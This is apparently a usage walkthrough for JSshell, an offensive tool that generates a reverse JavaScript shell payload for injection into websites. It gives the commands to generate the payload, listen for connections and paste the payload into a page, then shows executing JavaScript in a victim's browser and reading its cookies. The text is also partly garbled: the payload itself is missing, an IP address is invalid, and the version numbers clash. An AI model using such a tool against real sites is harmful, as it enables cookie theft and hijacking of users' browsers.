Updated in the new version of JShell 3.1:
>>> snippet Use CTRL+D to finish the snippet
jsh.py -p 1234
jsh.py -s 48.586.1.23 -g
jsh.py -c "alert(document.cookie)" -w 10
This is a step-by-step example for how to use JSshell.
First we will generate a reverse JS shell payload and set the shell timeout is 20 seconds:
~# whoami root ~# ls README.md jsh.py ~# python3 jsh.py -g -w 20 __ |(_ _ |_ _ | | \_|__)_> | |(/_ | | v1.0
Listening on [any] 4848 for incoming JS shell ...
Now paste this payload to the website (or URL):
Access the page and now we will see that we have got the reverse JS shell:
__ |(_ _ |_ _ | | \_|__)_> | |(/_ | | v1.0
Now let's execute some commands:
$ var test = 'controlled' $ alert(test) $
And the browser got an alert:
$ prompt(document.cookie) $
And the browser print the user cookies:
$ exit ~# whoami root ~# pwd /home/shelld3v ~#
And we quited!
This is created by shelld3v!